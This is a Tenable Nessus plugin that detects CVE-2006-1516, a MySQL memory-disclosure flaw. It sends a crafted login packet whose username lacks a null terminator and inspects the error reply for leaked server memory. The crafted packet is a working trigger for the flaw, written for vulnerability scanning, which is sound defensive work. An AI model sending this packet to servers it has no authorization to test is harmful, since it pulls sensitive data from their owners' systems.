
MySQL Anonymous Login Handshake Remote Information Disclosure


The MySQL database server on the remote host reads from uninitialized memory when processing a specially crafted login packet. An unauthenticated attacker may be able to exploit this flaw to obtain sensitive information from the affected host as returned in an error packet.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin metadata. This block runs when Nessus loads the plugin catalogue;
# the attribute values below are the contract the scanner and its reporting
# tooling read, so they are kept verbatim.
if (description)
{
  script_id(21632);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-1516");
  script_bugtraq_id(17780);

  script_name(english:"MySQL Anonymous Login Handshake Remote Information Disclosure");

  script_set_attribute(attribute:"synopsis", value:
"The remote database server is affected by an information disclosure
flaw.");
  script_set_attribute(attribute:"description", value:
"The MySQL database server on the remote host reads from uninitialized
memory when processing a specially crafted login packet.  An
unauthenticated attacker may be able to exploit this flaw to obtain
sensitive information from the affected host as returned in an error
packet.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/432733/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to MySQL 4.0.27 / 4.1.19 / 5.0.21 / 5.1.10 or later.");
  # CVSS2: network-reachable, low complexity, no auth; partial confidentiality
  # impact only (memory disclosure), no integrity or availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/06/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mysql:mysql");
  # NOTE(review): thorough_tests presumably restricts this check to scans
  # with "thorough tests" enabled, since it sends a crafted packet rather
  # than matching a banner — confirm against the scanner policy docs.
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check interacts with the service beyond a banner grab,
  # so the scanner schedules it in the attack phase.
  script_category(ACT_ATTACK);
  script_family(english:"Databases");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl");
  script_require_ports("Services/mysql", 3306);

  exit(0);
}


include("dump.inc");
include("global_settings.inc");
include("misc_func.inc");
include("mysql_func.inc");


port = get_service(svc:"mysql", default:3306, exit_on_fail:TRUE);

# Open a session with the server. The nessusd host must be permitted to
# connect for this to succeed.
mysql_init(port:port, nocache:TRUE, exit_on_fail:TRUE);

# MariaDB MaxScale produced a false positive for this check, so it is
# excluded before anything is sent.
ver = mysql_get_version();
if ('maxscale' >< ver) audit(AUDIT_LISTEN_NOT_VULN, 'MariaDB MaxScale', port, ver, 'MySQL');


# Assemble the crafted client-authentication packet.
#
# Capability flags: whatever the server advertised, plus
#   CLIENT_LONG_PASSWORD   (1)   => long password
#   CLIENT_CONNECT_WITH_DB (8)   => specify db on connect
#   CLIENT_PROTOCOL_41     (512) => 4.1 protocol
caps = mysql_get_caps() | CLIENT_LONG_PASSWORD | CLIENT_CONNECT_WITH_DB | CLIENT_PROTOCOL_41;

hdr =
  mkdword(caps) +                        # client capabilities
  mkdword(65535) +                       # max packet size
  mkbyte(mysql_get_lang()) +             # charset
  crap(data:raw_string(0), length:23);   # filler

# The username is sent without its terminating null byte; an affected
# server keeps reading past it and reflects what it finds in its error.
body =
  "nessus" +                             # username, no null terminator
  mkbyte(20) + crap(20) +                # scramble (length + data)
  SCRIPT_NAME + crap(20) + mkbyte(0);    # database name plus null byte

mysql_send_packet(data:hdr + body);
resp = mysql_recv_packet();

# Decide whether the reply marks the server as affected. A fixed server
# rejects the packet with "Bad handshake"; an affected one gets further
# and answers with one of the two messages below.
vuln = FALSE;
if (!isnull(resp))
{
  err = mysql_parse_error_packet(packet:resp);
  if (!isnull(err))
  {
    errmsg = err["msg"];
    vuln = ("Access denied" >< errmsg || "Incorrect database name" >< errmsg);
  }
}

if (vuln)
{
  # Only include the returned text (which may contain leaked server
  # memory) at higher verbosity levels.
  report = NULL;
  if (report_verbosity > 1)
    report = '\nHere is the text returned by the affected MySQL server :\n\n  ' + hexdump(ddata:err["msg"]) + '\n';
  security_warning(port:port, extra:report);
  mysql_close();
  exit(0);
}

mysql_close();
exit(0, 'The MySQL server on port '+port+' is not affected.');